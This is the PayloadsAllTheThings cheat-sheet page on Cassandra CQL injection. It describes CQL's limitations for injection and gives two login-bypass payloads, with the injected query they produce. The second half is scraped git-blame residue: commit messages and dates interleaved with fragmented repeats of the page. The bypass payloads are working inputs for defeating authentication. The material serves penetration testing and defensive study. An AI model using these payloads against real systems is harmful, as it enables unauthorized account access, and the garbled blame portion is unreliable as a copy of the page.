PayloadsAllTheThings/SQL Injection/Cassandra Injection.md

# Cassandra Injection

> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.


## Summary

* [CQL Injection Limitations](#cql-injection-limitations)
* [Cassandra Comment](#cassandra-comment)
* [Cassandra Login Bypass](#cassandra-login-bypass)
    * [Example #1](#example-1)
    * [Example #2](#example-2)
* [References](#references) 


## CQL Injection Limitations

* Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging. 

* Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata. 

* Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected. 

* Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesn’t include a `SLEEP()` function.

* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected. 


## Cassandra Comment

```sql
/* Cassandra Comment */
```


## Cassandra Login Bypass

### Example #1

```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```

### Example #2

```sql
username: admin'/*
password: */and pass>'
```

The injection would look like the following SQL query

```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```


## References

- [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
- [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)
-												Cassandra SQL + XSS MD + PHP Type Juggling

											
										
										
											2018-09-10 18:40:43 +00:00
+								# Cassandra Injection
-												SQL injections references updates

											
										
										
											2024-11-03 13:06:53 +00:00
+								> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.
-												Cassandra SQL + XSS MD + PHP Type Juggling

											
										
										
											2018-09-10 18:40:43 +00:00
-												Added Summary in Cassandra Injection
											
										
										
											2019-10-29 14:12:49 +00:00
+								## Summary
-												SQL injections references updates

											
										
										
											2024-11-03 13:06:53 +00:00
+								* [CQL Injection Limitations](#cql-injection-limitations)
-												XPATH + XSS + XXE + XSLT

											
										
										
											2024-11-30 20:14:51 +00:00
+								* [Cassandra Comment](#cassandra-comment)
 								* [Cassandra Login Bypass](#cassandra-login-bypass)
-												SQL injections references updates

											
										
										
											2024-11-03 13:06:53 +00:00
+								    * [Example #1](#example-1)
 								    * [Example #2](#example-2)
-												Added Summary in Cassandra Injection
											
										
										
											2019-10-29 14:12:49 +00:00
+								* [References](#references)
-												SQL injections references updates

											
										
										
											2024-11-03 13:06:53 +00:00
 								## CQL Injection Limitations
 								* Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging.
 								* Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata.
 								* Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected.
 								* Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesn’t include a `SLEEP()` function.
 								* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
-												XPATH + XSS + XXE + XSLT

											
										
										
											2024-11-30 20:14:51 +00:00
+								## Cassandra Comment
-												Cassandra SQL + XSS MD + PHP Type Juggling

											
										
										
											2018-09-10 18:40:43 +00:00
 								```sql
 								/* Cassandra Comment */
 								```
-												SQL injections references updates

											
										
										
											2024-11-03 13:06:53 +00:00
-												XPATH + XSS + XXE + XSLT

											
										
										
											2024-11-30 20:14:51 +00:00
+								## Cassandra Login Bypass
-												Cassandra SQL + XSS MD + PHP Type Juggling

											
										
										
											2018-09-10 18:40:43 +00:00
-												SQL injections references updates

											
										
										
											2024-11-03 13:06:53 +00:00
+								### Example #1
-												Cassandra SQL + XSS MD + PHP Type Juggling

											
										
										
											2018-09-10 18:40:43 +00:00
 								```sql
 								username: admin' ALLOW FILTERING; %00
 								password: ANY
 								```
-												SQL injections references updates

											
										
										
											2024-11-03 13:06:53 +00:00
+								### Example #2
-												Cassandra SQL + XSS MD + PHP Type Juggling

											
										
										
											2018-09-10 18:40:43 +00:00
 								```sql
 								username: admin'/*
 								password: */and pass>'
 								```
 								The injection would look like the following SQL query
 								```sql
 								SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
 								```
-												SQL injections references updates

											
										
										
											2024-11-03 13:06:53 +00:00
+								## References
-												Update Cassandra Injection.md

Broken link [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
											
										
										
											2020-10-09 12:40:12 +00:00
-												SQL injections references updates

											
										
										
											2024-11-03 13:06:53 +00:00
+								- [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
 								- [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)